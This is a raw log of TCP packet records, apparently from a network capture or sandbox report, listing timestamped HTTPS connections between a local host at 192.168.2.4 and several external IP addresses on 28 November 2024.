                                                        Nov 28, 2024 13:34:59.730824947 CET49812443192.168.2.434.107.203.234
                                                        Nov 28, 2024 13:34:59.730834961 CET4434981234.107.203.234192.168.2.4
                                                        Nov 28, 2024 13:34:59.733438969 CET49816443192.168.2.434.107.203.234
                                                        Nov 28, 2024 13:34:59.733469963 CET4434981634.107.203.234192.168.2.4
                                                        Nov 28, 2024 13:34:59.733531952 CET49816443192.168.2.434.107.203.234
                                                        Nov 28, 2024 13:34:59.733967066 CET49816443192.168.2.434.107.203.234
                                                        Nov 28, 2024 13:34:59.733979940 CET4434981634.107.203.234192.168.2.4
                                                        Nov 28, 2024 13:34:59.858175039 CET4434981435.201.124.9192.168.2.4
                                                        Nov 28, 2024 13:34:59.858422041 CET49814443192.168.2.435.201.124.9
                                                        Nov 28, 2024 13:34:59.858433962 CET4434981435.201.124.9192.168.2.4
                                                        Nov 28, 2024 13:34:59.859301090 CET4434981435.201.124.9192.168.2.4
                                                        Nov 28, 2024 13:34:59.859359980 CET49814443192.168.2.435.201.124.9
                                                        Nov 28, 2024 13:34:59.859683990 CET49814443192.168.2.435.201.124.9
                                                        Nov 28, 2024 13:34:59.859735012 CET4434981435.201.124.9192.168.2.4
                                                        Nov 28, 2024 13:34:59.859860897 CET49814443192.168.2.435.201.124.9
                                                        Nov 28, 2024 13:34:59.859868050 CET4434981435.201.124.9192.168.2.4
                                                        Nov 28, 2024 13:34:59.909089088 CET49814443192.168.2.435.201.124.9
                                                        Nov 28, 2024 13:35:00.320950031 CET4434981435.201.124.9192.168.2.4
                                                        Nov 28, 2024 13:35:00.321011066 CET4434981435.201.124.9192.168.2.4
                                                        Nov 28, 2024 13:35:00.321073055 CET49814443192.168.2.435.201.124.9
                                                        Nov 28, 2024 13:35:00.321197987 CET49814443192.168.2.435.201.124.9
                                                        Nov 28, 2024 13:35:00.321208954 CET4434981435.201.124.9192.168.2.4
                                                        Nov 28, 2024 13:35:00.614487886 CET4434981135.244.167.102192.168.2.4
                                                        Nov 28, 2024 13:35:00.614603996 CET4434981135.244.167.102192.168.2.4
                                                        Nov 28, 2024 13:35:00.614660025 CET49811443192.168.2.435.244.167.102
                                                        Nov 28, 2024 13:35:00.614691973 CET49811443192.168.2.435.244.167.102
                                                        Nov 28, 2024 13:35:00.614702940 CET4434981135.244.167.102192.168.2.4
                                                        Nov 28, 2024 13:35:00.614715099 CET49811443192.168.2.435.244.167.102
                                                        Nov 28, 2024 13:35:00.614777088 CET49811443192.168.2.435.244.167.102
                                                        Nov 28, 2024 13:35:00.996225119 CET4434981634.107.203.234192.168.2.4
                                                        Nov 28, 2024 13:35:00.996599913 CET49816443192.168.2.434.107.203.234
                                                        Nov 28, 2024 13:35:00.996615887 CET4434981634.107.203.234192.168.2.4
                                                        Nov 28, 2024 13:35:00.997807980 CET4434981634.107.203.234192.168.2.4
                                                        Nov 28, 2024 13:35:00.998186111 CET49816443192.168.2.434.107.203.234
                                                        Nov 28, 2024 13:35:00.998270035 CET4434981634.107.203.234192.168.2.4
                                                        Nov 28, 2024 13:35:00.998328924 CET49816443192.168.2.434.107.203.234
                                                        Nov 28, 2024 13:35:01.039336920 CET4434981634.107.203.234192.168.2.4
                                                        Nov 28, 2024 13:35:01.470952988 CET4434981634.107.203.234192.168.2.4
                                                        Nov 28, 2024 13:35:01.471347094 CET4434981634.107.203.234192.168.2.4
                                                        Nov 28, 2024 13:35:01.471553087 CET49816443192.168.2.434.107.203.234
                                                        Nov 28, 2024 13:35:01.473043919 CET49816443192.168.2.434.107.203.234
                                                        Nov 28, 2024 13:35:01.473057032 CET4434981634.107.203.234192.168.2.4
                                                        Nov 28, 2024 13:35:01.474236012 CET49817443192.168.2.434.107.203.234
                                                        Nov 28, 2024 13:35:01.474277020 CET4434981734.107.203.234192.168.2.4
                                                        Nov 28, 2024 13:35:01.474353075 CET49817443192.168.2.434.107.203.234
                                                        Nov 28, 2024 13:35:01.475500107 CET49817443192.168.2.434.107.203.234
                                                        Nov 28, 2024 13:35:01.475516081 CET4434981734.107.203.234192.168.2.4
                                                        Nov 28, 2024 13:35:01.619566917 CET49819443192.168.2.434.107.203.234
                                                        Nov 28, 2024 13:35:01.619587898 CET4434981934.107.203.234192.168.2.4
                                                        Nov 28, 2024 13:35:01.619637966 CET49819443192.168.2.434.107.203.234
                                                        Nov 28, 2024 13:35:01.619837999 CET49819443192.168.2.434.107.203.234
                                                        Nov 28, 2024 13:35:01.619848967 CET4434981934.107.203.234192.168.2.4
                                                        Nov 28, 2024 13:35:02.780236959 CET4434981734.107.203.234192.168.2.4
                                                        Nov 28, 2024 13:35:02.784715891 CET49817443192.168.2.434.107.203.234
                                                        Nov 28, 2024 13:35:02.784749985 CET4434981734.107.203.234192.168.2.4
                                                        Nov 28, 2024 13:35:02.785087109 CET4434981734.107.203.234192.168.2.4
                                                        Nov 28, 2024 13:35:02.785759926 CET49817443192.168.2.434.107.203.234
                                                        Nov 28, 2024 13:35:02.785815001 CET4434981734.107.203.234192.168.2.4
                                                        Nov 28, 2024 13:35:02.785902023 CET49817443192.168.2.434.107.203.234
                                                        Nov 28, 2024 13:35:02.831336975 CET4434981734.107.203.234192.168.2.4
                                                        Nov 28, 2024 13:35:02.875878096 CET4434981934.107.203.234192.168.2.4
                                                        Nov 28, 2024 13:35:02.883289099 CET49819443192.168.2.434.107.203.234
                                                        Nov 28, 2024 13:35:02.883306026 CET4434981934.107.203.234192.168.2.4
                                                        Nov 28, 2024 13:35:02.884195089 CET4434981934.107.203.234192.168.2.4
                                                        Nov 28, 2024 13:35:02.884258986 CET49819443192.168.2.434.107.203.234
                                                        Nov 28, 2024 13:35:02.886437893 CET49819443192.168.2.434.107.203.234
                                                        Nov 28, 2024 13:35:02.886496067 CET4434981934.107.203.234192.168.2.4
                                                        Nov 28, 2024 13:35:02.888313055 CET49819443192.168.2.434.107.203.234
                                                        Nov 28, 2024 13:35:02.888319969 CET4434981934.107.203.234192.168.2.4
                                                        Nov 28, 2024 13:35:02.938769102 CET49819443192.168.2.434.107.203.234
                                                        Nov 28, 2024 13:35:03.264683962 CET4434981734.107.203.234192.168.2.4
                                                        Nov 28, 2024 13:35:03.264739037 CET4434981734.107.203.234192.168.2.4
                                                        Nov 28, 2024 13:35:03.264801979 CET49817443192.168.2.434.107.203.234
                                                        Nov 28, 2024 13:35:03.265129089 CET49817443192.168.2.434.107.203.234
                                                        Nov 28, 2024 13:35:03.265141010 CET4434981734.107.203.234192.168.2.4
                                                        Nov 28, 2024 13:35:03.266599894 CET49821443192.168.2.434.107.203.234
                                                        Nov 28, 2024 13:35:03.266627073 CET4434982134.107.203.234192.168.2.4
                                                        Nov 28, 2024 13:35:03.266704082 CET49821443192.168.2.434.107.203.234
                                                        Nov 28, 2024 13:35:03.267316103 CET49821443192.168.2.434.107.203.234
                                                        Nov 28, 2024 13:35:03.267326117 CET4434982134.107.203.234192.168.2.4
                                                        Nov 28, 2024 13:35:03.353347063 CET4434981934.107.203.234192.168.2.4
                                                        Nov 28, 2024 13:35:03.353451014 CET4434981934.107.203.234192.168.2.4
                                                        Nov 28, 2024 13:35:03.353648901 CET49819443192.168.2.434.107.203.234
                                                        Nov 28, 2024 13:35:03.354253054 CET49819443192.168.2.434.107.203.234
                                                        Nov 28, 2024 13:35:03.354264975 CET4434981934.107.203.234192.168.2.4
                                                        Nov 28, 2024 13:35:03.354937077 CET49823443192.168.2.434.107.203.234
                                                        Nov 28, 2024 13:35:03.354952097 CET4434982334.107.203.234192.168.2.4
                                                        Nov 28, 2024 13:35:03.355005980 CET49823443192.168.2.434.107.203.234
                                                        Nov 28, 2024 13:35:03.355298996 CET49823443192.168.2.434.107.203.234
                                                        Nov 28, 2024 13:35:03.355307102 CET4434982334.107.203.234192.168.2.4
                                                        Nov 28, 2024 13:35:04.477559090 CET4434982134.107.203.234192.168.2.4
                                                        Nov 28, 2024 13:35:04.478991032 CET49821443192.168.2.434.107.203.234
                                                        Nov 28, 2024 13:35:04.479016066 CET4434982134.107.203.234192.168.2.4
                                                        Nov 28, 2024 13:35:04.479321957 CET4434982134.107.203.234192.168.2.4
                                                        Nov 28, 2024 13:35:04.482081890 CET49821443192.168.2.434.107.203.234
                                                        Nov 28, 2024 13:35:04.482136011 CET4434982134.107.203.234192.168.2.4
                                                        Nov 28, 2024 13:35:04.482234955 CET49821443192.168.2.434.107.203.234
                                                        Nov 28, 2024 13:35:04.523334026 CET4434982134.107.203.234192.168.2.4
                                                        Nov 28, 2024 13:35:04.611498117 CET4434982334.107.203.234192.168.2.4
                                                        Nov 28, 2024 13:35:04.660353899 CET49823443192.168.2.434.107.203.234
                                                        Nov 28, 2024 13:35:04.918438911 CET49823443192.168.2.434.107.203.234
                                                        Nov 28, 2024 13:35:04.918446064 CET4434982334.107.203.234192.168.2.4
                                                        Nov 28, 2024 13:35:04.918786049 CET4434982334.107.203.234192.168.2.4
                                                        Nov 28, 2024 13:35:04.920320034 CET49823443192.168.2.434.107.203.234
                                                        Nov 28, 2024 13:35:04.920363903 CET4434982334.107.203.234192.168.2.4
                                                        Nov 28, 2024 13:35:04.920825958 CET49823443192.168.2.434.107.203.234
                                                        Nov 28, 2024 13:35:04.944133043 CET4434982134.107.203.234192.168.2.4
                                                        Nov 28, 2024 13:35:04.944190979 CET4434982134.107.203.234192.168.2.4
                                                        Nov 28, 2024 13:35:04.944246054 CET49821443192.168.2.434.107.203.234
                                                        Nov 28, 2024 13:35:04.944582939 CET49821443192.168.2.434.107.203.234
                                                        Nov 28, 2024 13:35:04.944595098 CET4434982134.107.203.234192.168.2.4
                                                        Nov 28, 2024 13:35:04.967338085 CET4434982334.107.203.234192.168.2.4
                                                        Nov 28, 2024 13:35:05.329663992 CET4434982334.107.203.234192.168.2.4
                                                        Nov 28, 2024 13:35:05.329818010 CET4434982334.107.203.234192.168.2.4
                                                        Nov 28, 2024 13:35:05.329876900 CET49823443192.168.2.434.107.203.234
                                                        Nov 28, 2024 13:35:05.331933975 CET49823443192.168.2.434.107.203.234
                                                        Nov 28, 2024 13:35:05.331944942 CET4434982334.107.203.234192.168.2.4
                                                        Nov 28, 2024 13:35:05.332516909 CET49826443192.168.2.434.107.203.234
                                                        Nov 28, 2024 13:35:05.332554102 CET4434982634.107.203.234192.168.2.4
                                                        Nov 28, 2024 13:35:05.332618952 CET49826443192.168.2.434.107.203.234
                                                        Nov 28, 2024 13:35:05.333065033 CET49826443192.168.2.434.107.203.234
                                                        Nov 28, 2024 13:35:05.333079100 CET4434982634.107.203.234192.168.2.4
                                                        Nov 28, 2024 13:35:06.590466022 CET4434982634.107.203.234192.168.2.4
                                                        Nov 28, 2024 13:35:06.590758085 CET49826443192.168.2.434.107.203.234
                                                        Nov 28, 2024 13:35:06.590765953 CET4434982634.107.203.234192.168.2.4
                                                        Nov 28, 2024 13:35:06.591070890 CET4434982634.107.203.234192.168.2.4
                                                        Nov 28, 2024 13:35:06.591464043 CET49826443192.168.2.434.107.203.234
                                                        Nov 28, 2024 13:35:06.591515064 CET4434982634.107.203.234192.168.2.4
                                                        Nov 28, 2024 13:35:06.591609955 CET49826443192.168.2.434.107.203.234
                                                        Nov 28, 2024 13:35:06.635332108 CET4434982634.107.203.234192.168.2.4
                                                        Nov 28, 2024 13:35:07.065532923 CET4434982634.107.203.234192.168.2.4
                                                        Nov 28, 2024 13:35:07.065587997 CET4434982634.107.203.234192.168.2.4
                                                        Nov 28, 2024 13:35:07.066976070 CET49826443192.168.2.434.107.203.234
                                                        Nov 28, 2024 13:35:07.071968079 CET49826443192.168.2.434.107.203.234
                                                        Nov 28, 2024 13:35:07.071975946 CET4434982634.107.203.234192.168.2.4
                                                        Nov 28, 2024 13:35:13.771496058 CET49834443192.168.2.435.201.124.9
                                                        Nov 28, 2024 13:35:13.771523952 CET4434983435.201.124.9192.168.2.4
                                                        Nov 28, 2024 13:35:13.771907091 CET49834443192.168.2.435.201.124.9
                                                        Nov 28, 2024 13:35:13.772264004 CET49834443192.168.2.435.201.124.9
                                                        Nov 28, 2024 13:35:13.772275925 CET4434983435.201.124.9192.168.2.4
                                                        Nov 28, 2024 13:35:14.981509924 CET4434983435.201.124.9192.168.2.4
                                                        Nov 28, 2024 13:35:14.982316971 CET49834443192.168.2.435.201.124.9
                                                        Nov 28, 2024 13:35:14.982336044 CET4434983435.201.124.9192.168.2.4
                                                        Nov 28, 2024 13:35:14.982636929 CET4434983435.201.124.9192.168.2.4
                                                        Nov 28, 2024 13:35:14.983066082 CET49834443192.168.2.435.201.124.9
                                                        Nov 28, 2024 13:35:14.983119011 CET4434983435.201.124.9192.168.2.4
                                                        Nov 28, 2024 13:35:14.983495951 CET49834443192.168.2.435.201.124.9
                                                        Nov 28, 2024 13:35:15.031337976 CET4434983435.201.124.9192.168.2.4
                                                        Nov 28, 2024 13:35:15.036691904 CET49834443192.168.2.435.201.124.9
                                                        Nov 28, 2024 13:35:15.446381092 CET4434983435.201.124.9192.168.2.4
                                                        Nov 28, 2024 13:35:15.446511984 CET4434983435.201.124.9192.168.2.4
                                                        Nov 28, 2024 13:35:15.461210966 CET49834443192.168.2.435.201.124.9
                                                        Nov 28, 2024 13:35:15.522804022 CET49834443192.168.2.435.201.124.9
                                                        Nov 28, 2024 13:35:15.522864103 CET4434983435.201.124.9192.168.2.4
                                                        Nov 28, 2024 13:35:16.539235115 CET49836443192.168.2.435.201.124.9
                                                        Nov 28, 2024 13:35:16.539266109 CET4434983635.201.124.9192.168.2.4
                                                        Nov 28, 2024 13:35:16.539520979 CET49836443192.168.2.435.201.124.9
                                                        Nov 28, 2024 13:35:16.539736032 CET49836443192.168.2.435.201.124.9
                                                        Nov 28, 2024 13:35:16.539748907 CET4434983635.201.124.9192.168.2.4
                                                        Nov 28, 2024 13:35:17.801724911 CET4434983635.201.124.9192.168.2.4
                                                        Nov 28, 2024 13:35:17.842982054 CET49836443192.168.2.435.201.124.9
                                                        Nov 28, 2024 13:35:17.843003035 CET4434983635.201.124.9192.168.2.4
                                                        Nov 28, 2024 13:35:17.843575954 CET4434983635.201.124.9192.168.2.4
                                                        Nov 28, 2024 13:35:17.903096914 CET49836443192.168.2.435.201.124.9
                                                        Nov 28, 2024 13:35:18.146557093 CET49836443192.168.2.435.201.124.9
                                                        Nov 28, 2024 13:35:18.146769047 CET4434983635.201.124.9192.168.2.4
                                                        Nov 28, 2024 13:35:18.148447037 CET49836443192.168.2.435.201.124.9
                                                        Nov 28, 2024 13:35:18.195322990 CET4434983635.201.124.9192.168.2.4
                                                        Nov 28, 2024 13:35:18.200690031 CET49836443192.168.2.435.201.124.9
                                                        Nov 28, 2024 13:35:18.508173943 CET4434983635.201.124.9192.168.2.4
                                                        Nov 28, 2024 13:35:18.508265018 CET4434983635.201.124.9192.168.2.4
                                                        Nov 28, 2024 13:35:18.508388996 CET49836443192.168.2.435.201.124.9
                                                        Nov 28, 2024 13:35:18.508402109 CET4434983635.201.124.9192.168.2.4
                                                        Nov 28, 2024 13:35:18.509249926 CET49836443192.168.2.435.201.124.9
                                                        Nov 28, 2024 13:35:18.509263039 CET49836443192.168.2.435.201.124.9
                                                        Nov 28, 2024 13:35:19.521589994 CET49839443192.168.2.435.201.124.9
                                                        Nov 28, 2024 13:35:19.521637917 CET4434983935.201.124.9192.168.2.4
                                                        Nov 28, 2024 13:35:19.521747112 CET49839443192.168.2.435.201.124.9
                                                        Nov 28, 2024 13:35:19.521924973 CET49839443192.168.2.435.201.124.9
                                                        Nov 28, 2024 13:35:19.521939039 CET4434983935.201.124.9192.168.2.4
                                                        Nov 28, 2024 13:35:20.732911110 CET4434983935.201.124.9192.168.2.4
                                                        Nov 28, 2024 13:35:20.782104015 CET49839443192.168.2.435.201.124.9
                                                        Nov 28, 2024 13:35:20.856513023 CET49839443192.168.2.435.201.124.9
                                                        Nov 28, 2024 13:35:20.856527090 CET4434983935.201.124.9192.168.2.4
                                                        Nov 28, 2024 13:35:20.857142925 CET4434983935.201.124.9192.168.2.4
                                                        Nov 28, 2024 13:35:20.861815929 CET49839443192.168.2.435.201.124.9
                                                        Nov 28, 2024 13:35:20.861929893 CET4434983935.201.124.9192.168.2.4
                                                        Nov 28, 2024 13:35:20.863063097 CET49839443192.168.2.435.201.124.9
                                                        Nov 28, 2024 13:35:20.907327890 CET4434983935.201.124.9192.168.2.4
                                                        Nov 28, 2024 13:35:20.913546085 CET49839443192.168.2.435.201.124.9
                                                        Nov 28, 2024 13:35:21.206851006 CET4434983935.201.124.9192.168.2.4
                                                        Nov 28, 2024 13:35:21.206955910 CET4434983935.201.124.9192.168.2.4
                                                        Nov 28, 2024 13:35:21.209230900 CET49839443192.168.2.435.201.124.9
                                                        Nov 28, 2024 13:35:21.209340096 CET49839443192.168.2.435.201.124.9
                                                        Nov 28, 2024 13:35:21.209357977 CET4434983935.201.124.9192.168.2.4
                                                        Nov 28, 2024 13:35:23.926800013 CET49842443192.168.2.420.12.23.50
                                                        Nov 28, 2024 13:35:23.926842928 CET4434984220.12.23.50192.168.2.4
                                                        Nov 28, 2024 13:35:23.928220987 CET49842443192.168.2.420.12.23.50
                                                        Nov 28, 2024 13:35:23.928550005 CET49842443192.168.2.420.12.23.50
                                                        Nov 28, 2024 13:35:23.928563118 CET4434984220.12.23.50192.168.2.4
                                                        Nov 28, 2024 13:35:24.629446983 CET49843443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:24.629514933 CET4434984313.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:24.629600048 CET49843443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:24.629923105 CET49843443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:24.629941940 CET4434984313.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:25.541651011 CET4434984220.12.23.50192.168.2.4
                                                        Nov 28, 2024 13:35:25.541750908 CET49842443192.168.2.420.12.23.50
                                                        Nov 28, 2024 13:35:25.545250893 CET49842443192.168.2.420.12.23.50
                                                        Nov 28, 2024 13:35:25.545260906 CET4434984220.12.23.50192.168.2.4
                                                        Nov 28, 2024 13:35:25.545509100 CET4434984220.12.23.50192.168.2.4
                                                        Nov 28, 2024 13:35:25.556479931 CET49842443192.168.2.420.12.23.50
                                                        Nov 28, 2024 13:35:25.603337049 CET4434984220.12.23.50192.168.2.4
                                                        Nov 28, 2024 13:35:26.196197033 CET4434984220.12.23.50192.168.2.4
                                                        Nov 28, 2024 13:35:26.196477890 CET4434984220.12.23.50192.168.2.4
                                                        Nov 28, 2024 13:35:26.196496964 CET4434984220.12.23.50192.168.2.4
                                                        Nov 28, 2024 13:35:26.199292898 CET49842443192.168.2.420.12.23.50
                                                        Nov 28, 2024 13:35:26.199321032 CET4434984220.12.23.50192.168.2.4
                                                        Nov 28, 2024 13:35:26.199424982 CET49842443192.168.2.420.12.23.50
                                                        Nov 28, 2024 13:35:26.239721060 CET4434984220.12.23.50192.168.2.4
                                                        Nov 28, 2024 13:35:26.239759922 CET4434984220.12.23.50192.168.2.4
                                                        Nov 28, 2024 13:35:26.239808083 CET4434984220.12.23.50192.168.2.4
                                                        Nov 28, 2024 13:35:26.241117001 CET49842443192.168.2.420.12.23.50
                                                        Nov 28, 2024 13:35:26.241381884 CET49842443192.168.2.420.12.23.50
                                                        Nov 28, 2024 13:35:26.241583109 CET49842443192.168.2.420.12.23.50
                                                        Nov 28, 2024 13:35:26.241594076 CET4434984220.12.23.50192.168.2.4
                                                        Nov 28, 2024 13:35:26.241604090 CET49842443192.168.2.420.12.23.50
                                                        Nov 28, 2024 13:35:26.241607904 CET4434984220.12.23.50192.168.2.4
                                                        Nov 28, 2024 13:35:26.422194004 CET4434984313.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:26.422302008 CET49843443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:26.424297094 CET49843443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:26.424330950 CET4434984313.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:26.424582005 CET4434984313.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:26.434907913 CET49843443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:26.475348949 CET4434984313.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:26.910115957 CET4434984313.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:26.910139084 CET4434984313.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:26.910155058 CET4434984313.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:26.911813974 CET49843443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:26.911860943 CET4434984313.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:26.912277937 CET49843443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:27.093796015 CET4434984313.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:27.093817949 CET4434984313.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:27.093924999 CET49843443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:27.093961954 CET4434984313.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:27.094027996 CET49843443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:27.145235062 CET4434984313.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:27.145271063 CET4434984313.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:27.147357941 CET49843443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:27.147381067 CET4434984313.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:27.150158882 CET49843443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:27.282581091 CET4434984313.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:27.282607079 CET4434984313.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:27.287579060 CET49843443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:27.287611961 CET4434984313.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:27.287787914 CET49843443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:27.314656019 CET4434984313.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:27.314672947 CET4434984313.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:27.318001986 CET49843443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:27.318017006 CET4434984313.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:27.318171978 CET49843443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:27.335472107 CET4434984313.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:27.335489035 CET4434984313.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:27.335572958 CET49843443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:27.335588932 CET4434984313.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:27.335633993 CET49843443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:27.356153011 CET4434984313.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:27.356174946 CET4434984313.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:27.356245995 CET49843443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:27.356261969 CET4434984313.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:27.356352091 CET49843443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:27.474488974 CET4434984313.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:27.474508047 CET4434984313.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:27.474606037 CET49843443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:27.474636078 CET4434984313.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:27.474771976 CET49843443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:27.490817070 CET4434984313.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:27.490832090 CET4434984313.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:27.493616104 CET49843443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:27.493634939 CET4434984313.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:27.493705034 CET49843443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:27.506479979 CET4434984313.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:27.506494999 CET4434984313.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:27.506570101 CET49843443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:27.506584883 CET4434984313.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:27.506666899 CET49843443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:27.519941092 CET4434984313.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:27.519956112 CET4434984313.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:27.521169901 CET49843443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:27.521202087 CET4434984313.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:27.521753073 CET49843443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:27.535399914 CET4434984313.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:27.535455942 CET4434984313.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:27.537302971 CET49843443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:27.538705111 CET49843443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:27.538747072 CET4434984313.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:27.590266943 CET49844443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:27.590298891 CET4434984413.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:27.591008902 CET49845443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:27.591058016 CET4434984513.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:27.593142033 CET49847443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:27.593146086 CET49844443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:27.593151093 CET4434984713.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:27.593188047 CET49845443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:27.593188047 CET49847443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:27.593229055 CET49846443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:27.593238115 CET4434984613.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:27.594131947 CET49848443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:27.594153881 CET4434984813.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:27.594156981 CET49846443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:27.594321966 CET49846443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:27.594336987 CET4434984613.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:27.594393969 CET49844443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:27.594403982 CET4434984413.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:27.594465971 CET49845443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:27.594480038 CET4434984513.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:27.594494104 CET49848443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:27.597055912 CET49848443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:27.597069979 CET4434984813.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:27.597238064 CET49847443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:27.597248077 CET4434984713.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:29.321254015 CET4434984413.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:29.321706057 CET49844443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:29.321718931 CET4434984413.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:29.322261095 CET49844443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:29.322266102 CET4434984413.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:29.322583914 CET4434984713.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:29.322885036 CET49847443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:29.322912931 CET4434984713.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:29.323236942 CET49847443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:29.323242903 CET4434984713.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:29.386225939 CET4434984613.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:29.386589050 CET49846443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:29.386611938 CET4434984613.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:29.386986017 CET49846443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:29.386991024 CET4434984613.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:29.450956106 CET4434984513.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:29.451345921 CET49845443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:29.451358080 CET4434984513.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:29.451771975 CET49845443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:29.451781034 CET4434984513.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:29.466900110 CET4434984813.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:29.467299938 CET49848443192.168.2.413.107.246.63
                                                        Nov 28, 2024 13:35:29.467336893 CET4434984813.107.246.63192.168.2.4
                                                        Nov 28, 2024 13:35:29.467722893 CET49848443192.168.2.413.107.246.63
